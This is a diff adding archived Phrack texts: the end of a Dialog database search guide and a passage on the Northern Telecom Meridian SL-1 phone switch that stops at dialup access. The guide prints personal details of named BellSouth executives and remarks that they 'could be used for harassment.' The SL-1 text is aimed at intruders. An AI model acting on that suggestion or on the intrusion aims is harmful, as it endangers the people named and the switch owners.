+SQUARE FOOTAGE:  480,000  OWNED
+NUMBER OF ACCOUNTS: NA
+ACCOUNTING FIRM: Coopers & Lybrand Atlanta GA
+BANK: Chase Manhattan Bank NA Inc  BANK DUNS: 00-698-1815
+
+THIS IS:
+
+    A  HEADQUARTERS LOCATION
+    AN ULTIMATE LOCATION
+    A  CORPORATION
+    A  PUBLIC COMPANY
+    A  MILLION DOLLAR DIRECTORY COMPANY
+
+DUNS NUMBER:             10-667-8006
+CORPORATE FAMILY DUNS:   10-667-8006
+
+CHAIRMAN:                   Clendenin, John L  /Chb-Pres-Ceo
+PRESIDENT:                  Clendenin, John L  /Chb-Pres-Ceo
+VICE PRESIDENT:             O Neill, Robert W  /Vp Assoc Gen Counsel
+                            Markey, David J  /Vp-Govt Affairs
+                            Fiedler, Mark L  /Vp-Corp Development
+                            Gunter, John R  /V Pres-Corp Responsibility & C
+                            Casey, Patrick H  /V Pres-Comptroller
+                            Yokley, Arlen G  /V Pres-Sec-Treas
+SECRETARY:                  Yokley, Arlen G  /V Pres-Sec-Treas
+TREASURER:                  Yokley, Arlen G  /V Pres-Sec-Treas
+VICE-CHAIRMAN:              Holding, Harvey R  /V Chb-Finance &
+                             Administration
+                            McCoy, William O  /V Chb
+COUNSEL:                    Alford, Walter H  /Exec V Pres-Gen Counsel
+FINANCE:                    Holding, Harvey R  /V Chb-Finance @
+                             Administration
+RESEARCH AND DEVELOPMENT:   Fiedler, Mark L  /Vp-Corp Development
+EXECUTIVE VICE PRESIDENT:   McGuire, Raymond L  /Exec V Pres-Govt Affairs
+                            Alford, Walter H  /Exec V Pres-Gen Counsel
+                            Mauldin, Earle  /Exec Vp & Cfo
+SENIOR VICE PRESIDENT:      Reddersen, William F  /Sr Vp-Broadband
+                             Strategies
+CHIEF EXECUTIVE OFFICER:    Clendenin, John L  /Chb-Pres-Ceo
+ADMINISTRATION:             Reddersen, William F  /Sr Vp-Broadband
+                             Strategies
+                            McCoy, William O  /V Chb
+                            McGuire, Raymond L  /Exec V Pres-Govt Affairs
+                            Mauldin, Earle  /Exec Vp & Cfo
+                            Holding, Harvey R  /V Chb-Finance &
+                             Administration
+CHIEF FINANCIAL OFFICER:    Mauldin, Earle  /Exec Vp & Cfo
+MANAGEMENT:                 O Neill, Robert W  /Vp Assoc Gen Counsel
+SALES-MARKETING VP:         Gunter, John R  /V Pres-Corp Responsibility & C
+FINANCE VP:                 Casey, Patrick H  /V Pres-Comptroller
+ENGINEERING VP:             Fiedler, Mark L  /Vp-Corp Development
+
+
+Record 519 goes on and displays news and personal information on
+the executive officers, including the following:
+
+     At divestiture, AT&T transferred to this corporation its 100
+ownership in South Central Bell Telephone Company, Southern Bell Telephone
+and Telegraph Company and Bellsouth Mobility Inc.
+     Shareholders of AT&T as of Dec 30 1983 received one share of
+Bellsouth stock for every 10 common shares of AT&T stock.
+     Business started 1983.  The common stock is listed on the New York,
+Boston, Midwest, Pacific and Philadelphia stock exchanges under the symbol
+"BLS".  As of Jan 31 1993, there were 1,286,670 shareholders of record. The
+majority of the outstanding common stock is owned by the general public.
+Officers and directors own less than 1 of the outstanding stock.
+      ............RECENT EVENTS.........
+      In Jan 1992, the company and RAM Broadcasting Corporation formed a
+business venture to own and operate certain mobile data communications
+networks worldwide as well as certain cellular and paging operations in the
+US  (Further details on file at the Woodbury, NY office of Dun & Bradstreet).
+     During 1992, the company made several small acquisitions, principally
+related to cellular phone service.
+     On Sep 20 1991, the company acquired several properties in Indiana,
+Wisconsin and Illinois from McCaw Cellular Communications, Inc in exchange
+for $361 million, including BellSouth's interest in Rochester, NY's
+non-wireline cellular provider.
+     On Sep 17 1991, the company completed the acquisition of Graphic
+Scanning Corp for an adjusted total cash purchase price of $168 million.
+In addition, certain liabilities of Graphic Scanning amounting to
+approximately $142 million were assumed by BellSouth.
+    On Mar 28 1991, the company acquired from GTE Mobilnet Incorporated
+two cellular partnerships in which it held minority interests, which
+resulted in BellSouth Enterprises, Inc gaining an additional 21 interest
+in the Atlanta-Athens Limited Partnership and an additional 42 interest in
+the Lexington, Kentucky MSA Limited partnership.
+
+     ........MANAGEMENT BACKGROUND........
+     CLENDENIN born 1934 married.  1955 Northwestern University BS.
+1955-1978 Illinois Bell Telephone Co, Chicago, IL.  1975 Vice President.
+1978-1980 Pacific Northwest Telephone Co, Seattle, WA, Executive Vice
+President.  1980-1981 AT&T Vice President.  1981 Southern Bell Telephone.
+1984-present Chairman of Board, President, and CEO, Bellsouth Corporation.
+     MCCOY born 1933.  Graduate of University of North Carolina, 1955 BS,
+BA and MIT and 1968 MS Management.  1955-1959 U S Marine Corps. 1959-present
+BellSouth Corporation; 1993 Vice Chairman, BellSouth Corporation.
+     YOKLEY born 1937.  Graduate of Catawba College, Salisbury, NC 1959.
+1959 joined subject.
+     MCGUIRE born 1933 married.  Graduate of Mississippi College 1957 and
+University of Mississippi 1960.  1961-1965 law clerk of the U S Court of
+Appeals, 5th Circuit and trial attorney for tax division at the Department
+of Justice, Washington, DC and 1966 became Assistant U S Attorney, Northern
+District of Mississippi.  1967 joined Southern Bell Telephone and Telegraph
+Company (Inc), Atlanta, GA. Mar 1985 elected to present position.
+
+
+Explanation of Bellsouth search results:
+----------------------------------------
+
+    WOW! All they made in sales was 15 billion dollars -- and they call
+hackers crooks.  The data showing the news is helpful, and all
+the personal information could really be used for harassment purposes if
+necessary.  Take a look at their credentials.  A prospective employee
+could use this data to ass-kiss a little.  Their college references
+clearly show why the E911 document created such a fiasco in the company....
+
+
+<> - Searching and Search Strategy: Contrived and Free Text Searching
+---------------------------------------------------------------------
+
+     There are two different types of searching to find the topic you
+need: contrived and free text.  After selecting the "file" or database
+number that you want, Dialog gives you a "?" as a prompt.  At this
+point you can begin your searching.
+
+     Contrived word searches should begin offline though.  The database
+in question will send you a thesaurus (for a fee usually) which
+will tell you exactly what words correlate with your topic, so that
+you can go directly to the topic eliminating a lot of extra online
+time.  Keep in mind that each database has a different thesaurus
+so unless this database you have chosen is going to be your primary
+database of use down the road, then you may want to just use free
+text searching.
+
+     The only problem with free text searching is if your word is
+anywhere in an article it is counted and shown to you whether
+relevant or not.  Imagine searching for the word "aircraft" in an
+aeronautical database or "student" in an educational database.  The
+result could be apocalyptic as you would have to sort the data by
+its relevancy or irrelevancy.  That is why you need to develop what
+is called a "search strategy".  Although Dialog permits you to expand
+a too narrow search or condense a broad search, a perfect strategy will
+not require the use of these commands (I will discuss them later though).
+A perfect strategy is both effective, time efficient, and doesn't
+generate too many headaches.
+
+     The only things I feel that a search strategy needs to be considered
+a good one is the correct use of the system's language (you need to know
+exactly what you are typing in and why, just as with any other language -
+Fortran, C, etc.) and a synonym dictionary.  Occasionally my mind will go
+blank in searching through a database for a topic because once I have
+input the primary topic, I run out of ideas with which to draw
+correlations.  That is why you need the dictionary.  If I were searching
+with the word "student", I could use the word "pupil" and "scholar" as
+other points of venue to search with after I have looked up "student" in
+the dictionary.  By using this technique, you are sort of using a
+modification of the contrived word search as the costly thesaurus
+does the same action as your two dollar synonym dictionary.
+
+Beginning Your Search: The SELECT Command
+-----------------------------------------
+
+     After completing the login procedure, began the database that
+you want to search, and viewed the welcome banner, etc. you will
+be shown the following message:
+
+Set  Items  Description
+---  -----  -----------
+
+?
+
+This question mark tells you to start your search.  Functionally
+the Select command will search through the database looking for the
+terms that you have specified.  The correct way to do this is as
+follows:
+
+? S [term]
+
+ex.  ? S COMPUTER
+
+Although very broad, the select command will search the entire database
+for the word "Computer" and will compile a total list.  It will
+display it to you as the following:
+
+? S COMPUTER
+   S1 27263  COMPUTER
+
+After each search the S# will increment itself by one.  What this
+does is ease in the resurrection of searching.  If I ever wanted to
+use the word "Computer" again, all I would have to type in is: "S1"
+for an easy substitution.  Especially when I am using CD-ROM, I like
+to use a very broad topic to begin my searching, and then I will narrow
+it down.  The word "Computer" fits this description.
+
+Adding meaning to the SELECTion
+-------------------------------
+
+     Here I would like to talk a little about the words "and" and
+"or".  These words are definitely the most important words to search
+with.  Specifically they will narrow down your search because you
+are using one more word to help you find and article.
+
+ex.  ? S COMPUTER AND CRIME             or          S S1 AND CRIME
+        27263  S1
+        356    CRIME
+
+        S2  49 S1 AND CRIME
+
+Notice how "CRIME" had 356 articles that contained its word, however
+when combined with the word "Computer" only had 49!  This makes it
+very easy to narrow your search down to specifics, but not all the way
+as I will further explain.
+
+     Another command I would like to discuss is the "SS" command.
+This is an abbreviation of the Select command known as "Select Steps".
+What this does is break up a search into individual steps.
+
+ex.   ? SS COMPUTER AND CRIME
+          S4  27263  COMPUTER
+          S5    356  CRIME
+          S6     49  COMPUTER AND CRIME
+
+This is specifically used if I want to individualize a search and
+use the terms for other topics.  Keep in mind that the assigning of
+these steps and the individual searches that it must conduct may
+result in slower processing times thereby running up your total
+online bill.
+
+     When Dialog is asked to do a search, it retrieves the following
+in what is called fields: Title, Abstract, Descriptors, and Identifiers.
+The two most important fields are the descriptors and identifiers.
+When scanning a database that has come up with fifteen sources the
+easiest way to determine if these articles are worth keeping or
+tossing into the circular file is through the descriptors and
+identifiers.  The "Descriptor" will in two words or less explain the
+entire article, which is why they are otherwise known as the controlled
+vocabulary terms.  Identifiers, on the other hand, are the free language
+terms.  These are the ones we can relate to on an easier plane.  You
+can also search specifically for descriptors or identifiers as well as
+a lot more terms by the following commands.
+
+Ex.  S COMPUTER AND CRIME/DE
+
+This will search for computer and will use crime as a descriptor.  /ID
+works as well for identifiers.  Other suffixes can be used as according
+to the following table:
+
+                         Index Listing - Part 1
+                                Table 3
+
++--------------------------------------------------------------------------+
+| Suffix |     Field Name     |     Indexing     |   Examples              |
+|--------|--------------------|------------------|-------------------------|
+|  /AB   |     Abstract       |      Word        | S COMPUTER AND CRIME/AB |
+|        |                    |                  |                         |
+|  /DE   |     Descriptor     |  Word and Phrase | S COMPUTER AND CRIME/DE |
+|        |                    |                  |                         |
+|  /ID   |     Identifier     |  Word and Phrase | S COMPUTER AND CRIME/ID |
+|        |                    |                  |                         |
+|  /TI   |     Title          |      Word        | S COMPUTER AND CRIME/TI |
++--------------------------------------------------------------------------+
+
+Truncation
+----------
+
+     Truncation permits you to search for different forms of a
+search term.  On Dialog, the symbol is "?".  For instance, if I wanted
+to search for a word and I didn't know its exact spelling, I would do
+the following:
+
+ex. [Searching for the word Capone or Capoan, but not quite sure]
+
+     ?  S CAPO?
+          S1 122753  CAPO?
+
+This also can be used in several other ways.  For instance, plurality,
+or maximum number of letters following a word.  Example:
+
+ex.  ?  S CAPO??
+
+This maximizes the word search at two letters past the "O".
+
+ex.  ?  S CAPONE?
+
+This finds the plurality in the word capone.
+
+ex.  ?  S CAP?  ?
+
+This finds the letters between the two question marks.
+
+
+Proximity and Field Operators
+-----------------------------
+
+     Proximity operators specify the position of search terms in
+relation to each other within a record or field.  If I wanted to search
+for the words "Legion" and wanted to make sure that the word "Doom"
+was within a certain area around it, I would use a proximity operator.
+For instance:
+
+? S LEGION(3W)DOOM
+       932   LEGION
+       812   DOOM
+        27   LEGION(3W)DOOM
+
+In the above example Doom was searched within three words of Legion.
+You can use any number in place of the three.  The good thing about
+this proximity operator is that it searches the second word from the
+first on both sides.  Using the above example here is a picture of it:
+
+         Doom <---- 3 words ----> Legion <---- 3 words ----> Doom
+
+     A field operator allows two words to be within a field in any
+order.  For example:
+
+? S COMPUTER(F)CRIME/DE
+       14321  COMPUTER/DE
+        2720  CRIME/DE
+          95  COMPUTER(F)CRIME/DE
+
+This shows that in the descriptor section of a search, the words
+computer and crime show up ninety-five times together.  They could be
+completely unrelated, although this is doubtful.
+
+     The L operator is used exclusively for the descriptor section.
+This operator simply "links" the words together.  A search term looks
+like this:
+
+? S COMPUTER(L)CRIME
+
+     The N operator is used similar to the W operator in that it
+searches for a proximity of one word from another.  Here is an example
+of a search:
+
+? S COMPUTER(5N)CRIME
+
+This searches for the words computer and crime within five words
+of each other.  Another way the N is used is to search with words
+that are the same, for instance the words: air-to-air, or
+protein(N)protein.  The below example when using the "N" operator
+shows in the text just why the file would be flagged by the search
+program.  Notice the "protein/protein".
+
+? S PROTEIN(N)PROTEIN
+
+... surfaces presumably as a result of dynamic process of protein
+adsorption and desorption and protein / protein interaction.
+
+Sample Record
+-------------
+
+     In order for me to discuss critical points in a found record
+I first need to show the record itself.  The following record was
+searched in the ERIC database (File number 1 - - $.50 per minute and
+$30.00 per hour).
+
+-----------------------------------------------------------------------------
+
+  EJ330267  JC504091
+  Invitation to a Hacker.
+  Archer, Chalmers, Jr.; Archer, A. J. Finch
+  Community, Junior and Technical College Journal, v56 n4 p26-28 Feb-Mar
+  1986
+  Available From: UMI
+  Language: English
+  Document Type: JOURNAL ARTICLE (080)
+  Journal Announcement: CIKMAY86
+  Examines the susceptibility of computerized institutional records to
+security violations by "hackers," wishing to access the systems.  Points
+to practices that encourage security abuses and risk confidentiality.
+Outlines procedures used by Northern Virginia Community College to protect
+its computer system. (LAL)
+  Descriptors: Community Colleges; *Computer Oriented Programs; *Computers;
+Confidentiality; *Confidential Records; Two Year Colleges
+  Identifiers: *Hackers; School Records
+
+-----------------------------------------------------------------------------
+
+Let us examine this search more closely.
+
+EJ330267                : This is what is known as the Dialog Accession
+                          Number.  All files contained in the Dialog system,
+                          no matter what database has an accession number.
+                          You can search for an article exactly by this.
+                          Use the index AN=.  Example:
+                          S AN=EJ330267  |  Will call up the above article.
+
+Invitation to a Hacker  : This is the title, use /TI as the index for this.
+
+Archer, Chalmers, Jr.   : This is the author, Use the index AU=.  Example:
+                          S AU=ARCHER, CHALMERS, JR.
+
+Community, Junior ...   : This is the location, the source of the
+                          publication.  Use the index SO=.
+
+English                 : This is the language.  Dialog lets you search
+                          for articles in different languages.  Use the
+                          index LA=.
+
+CIJMAY86                : This is the Journal Announcement.  You can use
+                          the index JA=
+
+And you know the Abstract, descriptors and identifiers.  The following
+table shows all the indexes including the ones above for convenience.
+
+                         Index Listing - Part 2
+                                Table 4
+
++--------------------------------------------------------------------------+
+| Prefix |                 Field Name                  |     Indexing      |
+|--------|---------------------------------------------|-------------------|
+| AN =   |  DIALOG Accession Number                    |      Phrase       |
+| AU =   |  Author                                     |      Phrase       |
+| BN =   |  International Standard Book Number (ISBN)  |      Phrase       |
+| CD =   |  Conference Date                            |      Phrase       |
+| CL =   |  Conference Location                        |      Word         |
+| CS =   |  Corporate Source                           |      Word         |
+| CT =   |  Conference Title                           |      Word         |
+| CY =   |  Conference Year                            |      Phrase       |
+| DT =   |  Document Type                              |      Phrase       |
+| JA =   |  Journal Announcement                       |      Phrase       |
+| JN =   |  Journal Name                               |      Phrase       |
+| LA =   |  Language                                   |      Phrase       |
+| PY =   |  Publication Year                           |      Phrase       |
+| SN =   |  International Standard Serial Number (ISSN)|      Phrase       |
+| SO =   |  Source Publication                         |      Word         |
+| SP =   |  Conference Sponsor                         |      Word         |
+| UD =   |  Update                                     |      Phrase       |
++--------------------------------------------------------------------------+
+
+The TYPE Command
+----------------
+
+     The TYPE command is used to display your search results.  Once you
+"S" the topic, you can display it in eight different formats.  Each
+format costs a different price and varies with each database.  It is
+usually more to display a full record than abstracts though.  The
+command is listed as follows:
+
+T (or TYPE) set/format/range of records
+
+ex. T s1/5/1-20
+
+This will "type" the results found in s1, show the whole record
+(format 5), and display the first twenty records.  The command can
+also be used to directly display an accession number as displayed
+in the following:
+
+T (or TYPE) accession number/format
+
+ex. T EJ330267/5
+
+This will display the full record of the "Invitation to a Hacker"
+(the sample record). Note that most Dialog databases contain citations and
+sometimes abstracts of articles but NOT the full text of the article. There
+are some databases that do contain the full text of articles but most don't.
+The reason most people search these databases is to get a bibliography
+of articles that have been written on their topic. After reviewing the
+results of their search, they can decide which if any, of the articles
+published that they want a copy of. Obtaining full text copies of
+articles is referred to as 'Document Delivery' service. Sometimes you
+will see that the newspaper, magazine, or journal that a specific article
+you obtained a citation of is in your library and can just photocopy it
+yourself. Other times, the journal may be in another library perhaps
+hundreds of miles away, in which you can request it via ILL (Inter-Library
+Loan). And if you have no clue where to find a copy of the source of
+an article, you can ask Dialog or the individual database supplier to
+get a copy for you, typically at a cost in upwards of $15.00 for an
+article from 1 to 20 pages. Fifteen bucks is a bit steep for a 2 page
+article, so be sure you really need it before ordering. Besides, most
+articles don't contain as much info that the title or abstract implies
+it does.
+
+   If you need direct record access, with any options in the Dialog command
+system, just input the accession number.  All eight formats are shown in the
+following table.
+
+                             Predefined Formats
+                                  Table 5
+
++--------------------------------------------------------------------------+
+|          Format Number             |            Record Content           |
+|------------------------------------|-------------------------------------|
+|               1                    |  DIALOG Accession Number            |
+|               2                    |  Full Record except Abstract        |
+|               3                    |  Bibliographic Citation             |
+|               4                    |  Full Record with Tagged Fields     |
+|               5                    |  Full Record                        |
+|               6                    |  Title and DIALOG Accession Number  |
+|               7                    |  Full Record except Indexing        |
+|               8                    |  Title and Indexing                 |
++--------------------------------------------------------------------------+
+
+User Defined Format Options
+---------------------------
+
+     If you are not satisfied with the eight formats, you can
+modify the output to display exactly what you want.  The command
+would look like the following:
+
+ex. TYPE S3/AU,TI/1-5
+
+This would exclusively show the author and the title in records
+one through five.
+
+The EXPAND Command
+------------------
+
+     The EXPAND command allows you to look through the database
+like looking through a dictionary.  The command would look like this:
+
+ex.         ? E AU=CAPONE, F
+           Ref  Items  Index-term
+           E1       4  AU=CAPONE, A
+           E2      10  AU=CAPONE, B
+           E3      55  AU=CAPONE, C
+           E4       8  AU=CAPONE, D
+           E5       4  AU=CAPONE, E
+           E6       2  AU=CAPONE, F
+           E7      10  AU=CAPONE, FA
+           E8     912  AU=CAPONE, FB
+
+This is an especially useful term or name if you don't know exactly what
+you are looking for.
+
+Conclusion
+----------
+
+     This file should give you an overview of the Dialog Information
+System.  I exited the hacking world shortly after The Leftist, The
+Urvile/Necron 99, and The Prophet were arrested in Operation Sundevil,
+and Digital Logic's Data Service went down permanently along with my
+sysop access.  It wasn't until a few years later did I reenter the
+computer world to find a whole lot of things to have changed
+including my hacker ethic.  I felt writing this file would be a
+natural progression from my original hacking talents to "hacking" on
+a legal basis.
+
+     I would like to thank Erik Bloodaxe (for encouragement and
+project ideas) and Lex Luthor (for more project ideas and editing).
+If you have any questions or comments my Internet address is:
+alcapone@mindvox.phantom.com.  On IRC, I am usually on either
+#mindvox or #hack so look me up and say "Hey!".
+ 
diff --git a/phrack44/19.txt b/phrack44/19.txt
new file mode 100644
index 0000000..f23b6c5
--- /dev/null
+++ b/phrack44/19.txt
@@ -0,0 +1,638 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 19 of 27
+
+****************************************************************************
+
+                      Northern Telecom Meridian SL-1
+
+                                by Iceman
+
+                               Introduction
+                               ~~~~~~~~~~~~
+
+ This article is the first in a possible series devoted to Northern
+Telecom's line of Meridian SL-1 switches. At the moment, I'm unsure if there
+will even be a second article, since it would consist completely of the
+programming of these switches, and it's not difficult for me, or anyone else
+to type up a manual. If you haven't heard of an SL-1 before, to put things
+simply, if you have ever called a Meridian Voice Mail system, this is the
+computer that runs the show! Not all SL-1's have Voice Mail features, but
+it makes things easier (for the electronic adventurer) if you have one that
+does. Now it's far more than a simple voice mail system, it's a complete
+phone switch, a PBX. Of course, like most computers, if you can gain access
+to it, the system is at your beckon call, to do what you make it do. What
+follows is a brief history, and technical overview of the SL-1 series, as
+well as information on identifying them. If this looks familiar, a large
+portion of this article appeared my own magazine, Freedom, but was updated
+for Phrack. If you had read the issue relating to SL-1's, you will also
+find basic programming information for some of the more commonly used
+overlay programs, it was purposely omitted in this article.
+
+   History and Technical Overview
+   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Development of Northern Electric's SL-1 started in 1971. Their
+objective was to design a superior communications system for business
+subscribers in the range of 100 to 7600 stations. The system had to encompass
+all the features of a PBX, Centrex and key systems and be economically
+competitive with them. It had to have new custom services not previously
+feasible with the older systems. It had to be easy to learn and to operate.
+As well, it had to be easy to install and maintain.
+
+ What the designers came up with was a digital, stored program control
+machine using an 8-bit PCM. They also came up with a new telephone instrument,
+the SL-1 telephone, which is a multi-line instrument with many features, but
+uses only 2 pairs of wires, instead of 25 pairs required by key telephones.
+
+ The SL-1 system has three main parts: The common equipment (CE), the
+peripheral equipment (PE) and the power supplies.
+
+ The CE performs the central control and switching functions for all
+the connecting lines and trunks. It has a central processing unit (CPU) and
+read/write memory which stores all the operating programs and data unique
+to the particular system, including switching sequences, feature and class
+of service information, and numbers and types of terminals. Various models
+use various media to store information, ranging from magnetic tape drives
+to disk drives, for high-speed loading of the operating programs and data
+into the read/write memory, and providing data restoration after a power
+failure.  This media also contains the diagnostic routines, and all software
+needed to program the switch. There is a Teletype to communicate to the system
+with and to print error messages on. The network circuits perform the switching
+duties for all lines and trunks. The digital service circuits provide for such
+functions as dial and ringing tones and call conferencing.
+
+ The CE units communicate over a common central bus under control of
+the CPU. Speech signals, converted to digital, follow a separate path on a
+network switching bus.
+
+ The PE performs the interface between the line and trunk circuits and
+the SL-1 system. It consists mainly of line and trunk cards which convert
+analog speech to digital signals for digital switching and vice-versa. Lines
+connect to individual instruments and trunks to other PBX's. Peripheral
+buffers act as interface between the PE and the CE providing power control,
+timing and switching control signals for the line and trunk circuits. Digital
+conversion into 8-bit PCM is done by a single encoder/decoder (codec) for each
+line or trunk. This codec is a custom LSI circuit.
+
+ Between the PE and the CE, all signals travel in digital format on
+time multiplexed loops. Each loops carriers 30 voice channels, one control
+signalling channel and one unused channel. The channels operate at 64 kbps
+to give a total data rate of 2.048 mbps. Each loops terminates on a different
+circuit pack in the CE. There can be up to 16 multiplex loops.
+
+ When a call is set up, the CPU assigns each party a channel from among
+the 30 on their own multiplex loops. These channels form a matched pair. For
+instance, the calling party may use channel 2 of it's digital loop, and the
+called party may use channel 3 of it's loop.
+
+ The SL-1 conducts audio digitally. The line and trunk cards contain
+A/D and D/A converters. Received audio is changed to a digital signal and
+put on a voice channel. At it's destination, the digital signal is converted
+back to analog audio.
+
+ All programming is done from a keyboard with the output going to a
+printer. To program, a specific diagnostic program, called an overlay, is
+selected, and is automatically loaded from tape or disk. Once this is done,
+the appropriate commands are entered to change the options. All inputs, and
+SL-1 responses are echoed on a printer or echoed out of the specified port.
+If any system parameters or configurations are changed, these changes will
+not survive a total power outage unless a new tape or disk is made.
+
+ In case of a power outage, upon restoration of power, the SL-1 activates
+the tape or disk unit and loads in the system operating data, and runs some
+diagnostics. This takes from 5-15 minutes, and at the end of that time,
+service is fully restored with all the options which were recorded on the tape
+or disk being implemented. Of course any user-selected options like speed
+call lists and call waiting which had been selected before the outage will
+be lost.
+
+ Automatic diagnostics (called 'background' programs) are being run
+constantly with the results of any problems being echoed to output. At
+midnight a more thorough set of diagnostics are run. Any of the diagnostics
+may be run on demand from the keyboard. Also available on demand from the
+keyboard are a series of diagnostics to determine the status of lines and
+trunks, to trace calls, and to print lists and traffic studies.
+
+     SL-1 Features
+     ~~~~~~~~~~~~~
+
+ - Call Waiting                     - Digitone (DTMF) service
+ - Ring Again                       - Direct inward dialing
+ - Display services                 - Direct outward dialing
+ - Tandem switching                 - Private line service
+ - Special dial tone                - Remote administration and
+ - Traffic measurement                maintenance
+ - Common control switching         - Multi-customer group operation
+   arrangement access               - Line/trunk lockout
+ - Data transmission                - Flexible numbering system
+ - Access to automatic recorded       (2 to 4 digits)
+   answering equipment              - Pulse to DTMF conversion
+ - Access to paging equipment       - DTMF to pulse conversion
+ - Call forward - busy              - Emergency transfer
+ - Call forward - don't answer      - Hunting
+ - Call forward - follow me         - Intercept
+ - Call pickup                      - Manual service
+ - Conference (3 or 6 party)        - Night service
+ - Service restrictions
+
+     SL-1 Telephone Set Features
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ - Autodial                         - Automatic preselection
+ - Call status                      - Headset connection
+ - Call forwarding                  - Executive override
+ - Call transfer                    - Hold
+ - Speed calling                    - On-hook dialing
+ - Call waiting                     - LED indicators
+ - Tone ringing                     - Call pickup
+ - Common audible signalling        - Loudspeaker/Amplifier
+ - Ring again                       - Voice calling
+ - Hands free operation             - Manual signalling
+ - Multiple appearance directory    - 3 or 6 party conference
+   number; multiple call            - non-locking keys
+   arrangements                     - Single appearance directory
+ - Prime directory number             number
+ - Station set expansion            - Privacy
+ - Privacy release
+
+
+   Explanation of Some Features
+   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Station to station calling - Any station can directly call any other station
+without attendant assistance.
+
+Direct Outward Dialing (DOD) - Allows a station to gain access to the exchange
+network without attendant assistance and receives a second dialtone.
+
+Hunting - Routes a call to an idle station directory number when the called
+number is busy. The numbers in the hunt group do not have to be in sequence
+nor do they have to appear on the same instrument. The sequence can be
+consecutive (station directory numbers are hunted in ascending numerical
+order) or non-consecutive.
+
+Access to paging - Provides a connection to customer-owned paging equipment.
+
+Access to Automatic Recorded Answering Equipment - SL-1 stations can have
+incoming messages recorded on customer-provided answering equipment by
+forwarding calls to the directory number (DN) assigned to the equipment.
+
+Direct Inward Dialing (DID) - Allows an incoming call from the exchange
+network to reach a station without attendant assistance. The DN for each
+station will normally be the last 2,3 or 4 digits of the 7 digit exchange
+network number.
+
+Tandem Switching - The SL-1 can act as an intermediate switching point for
+traffic between other PBX's.
+
+Manual Service - Does not provide a dialtone when a station goes off-hook.
+Instead the attendant is alerted and completes the call for the user.
+
+Private Line Service - Permits the appearance of a private central office line
+on an SL-1 Telephone set. Dialtone is received directly from the telco and
+calls are not processed by the SL-1.
+
+Multi-Customer Group Operation - Allows for the provision of services for more
+than one business customer from the same switching machine. Each customer
+is totally separate from the others, may have the same directory numbers as
+the others, has his own attendant console, his own trunks, and cannot directly
+call stations belonging to the other customers.
+
+Service Restrictions - Allows the ability to restrict various functions.
+
+Intercept - Disposes of calls which cannot be completed because of
+restrictions or dialing errors. They are either routed to the attendant
+or overflow tone.
+
+Special Dial Tone - A Regular dialtone with three 128 ms interruptions at the
+beginning to advise the user that his hookswitch flash has been successful.
+
+Line Lockout - Disconnects stations which have been off-hook for too long to
+prevent system problems.
+
+Night Service - Allows the attendant to preconnect some or all of the incoming
+telco trunks to selected DN's on the SL-1.
+
+Emergency Transfer - Puts the system in the power fail transfer mode. This
+transfers telco trunks to selected stations to provide some continuity of
+service to the outside world during the time the SL-1 is inoperative.
+
+Remote Administration and Maintenance - Permits operation of the diagnostics
+from a remote location via a modem and telephone line. You may do anything
+from the remote terminal that you can do from the local terminal.
+
+Call Forward - Busy - Routes incoming calls to another number when the called
+station is busy.
+
+Call Forward - Don't answer - Routes incoming calls to another number when the
+called station doesn't answer within a prescribed time.
+
+Call Forward - Follow me - Routes incoming calls to another, programmable
+number.
+
+Call Waiting - Informs the user of a second incoming call while he is already
+in conversation. He can then place the first caller on hold and answer the
+second call. He can then return to the first call.
+
+Conference - Allows a user to connect up to either 1 or 4 additional persons
+into an existing call. Up to 2 of the users may be trunks.
+
+Call Pickup - Allows a station to answer an incoming call to another station
+in the same pickup group by dialing a special code.
+
+Ring Again - Permits a calling station, on encountering a busy DN, to operate
+a dedicated key or dial a special code to have the system monitor the called
+station and alert him when it goes idle. He is then automatically connect to
+that station when he goes off-hook or presses the key during the alert and the
+system rings that station.
+
+Data Transmission - The SL-1 is suitable for voiceband data transmissions
+and is compatible with a conventional modem.
+
+
+     SL-1 Models
+     ~~~~~~~~~~~
+
+Model    Lines     Introduced    Generic      Features
+~~~~~    ~~~~~     ~~~~~~~~~~    ~~~~~~~      ~~~~~~~~
+SL1-L    300-700      1975         x01      - N/A
+
+SL1-VL   700-2500     1976         x02      - Multi customer operation
+         - Automatic Identification of
+           outward dialing
+         - Do not disturb
+
+CDR      N/A          1977       x03,x04,   - Call detail recording
+     x08 - Recorded Announcement
+         - Digit display console
+
+SL1-LE   300-700      1978         x05      - Automatic Route Selection
+
+SL1-VLE  700-2500      N/A         N/A      - Remote peripheral equipment
+         - Automatic Number Identification
+         - "E" system
+         - Autovon
+
+SL1-A    60-400       1979       x06,x07,   - Centralized attendant service
+     x14        - Automatic call distribution
+         - Digit display SL-1 Sets
+         - 2500 Set Features
+         - Direct inward system access
+         - Dial Intercom
+         - Message Center
+         - Hotel/Motel
+         - International Phase 1
+
+SL1-XL   1000-5000    1980       x09,X17    - Advanced ACD packages
+         - Multiple message center
+         - Integrated voice and data
+           switching
+         - Hospital/Clinic
+         - International Phase 2
+
+ESN      N/A          1981       x9000      - Office data administration
+           system
+         - Automatic Wake-up
+         - Room status
+         - Auxiliary data system
+         - Electronic switched network
+         - International Phase 3
+
+SL1-M    60-400       1982       x11 rls 1  - Attendant Administration
+         - Attendant overflow
+         - Automatic set relocation
+         - History file
+         - Call park
+         - Flexible code restriction
+         - System speed call
+         - International Phase 4&5
+
+SL1-S    30-160       1983       x11 rls 4  - Distinctive ringing
+         - Stored number redial
+         - Async. interface module
+         - Sync. data transmission
+         - Multi-channel data system
+         - SL-1 displayphone
+         - Hotel/Motel
+
+
+'Generic' refers to the software version. It is expressed as a 3 or 4 digit
+number where the first part of the number indicates the machine it is for
+and the second part indicates the purpose of the software and serves as a
+version number and also indicates the type of machine it can be used with. The
+'X' stands for a 1 or 2 digit number representing the model:
+
+1 = SL1-L     2 = SL1-VL     3 = SL1-LE     4 = SL1-VLE     5 = SL1-A
+6 = SL1-XL    7 = SL1-M/S    8 = SL1-N      9 = SL1-XN      10= SL1-ST
+11= SL1-NT    12= SL1-XT
+
+        Maintenance Programs
+        ~~~~~~~~~~~~~~~~~~~~
+
+ All troubleshooting procedures, configuration changes and circuit
+disabling/enabling are carried out from the keyboard of a Teletype via
+software programs. There is virtually no physical contact with the exchange
+other than required to remove a defective board and replace it with a spare.
+Even this does not require tools.
+
+ Before running a program you must first gain access to the computer.
+The dialup will normally be a 1200 baud connection, with an even parity,
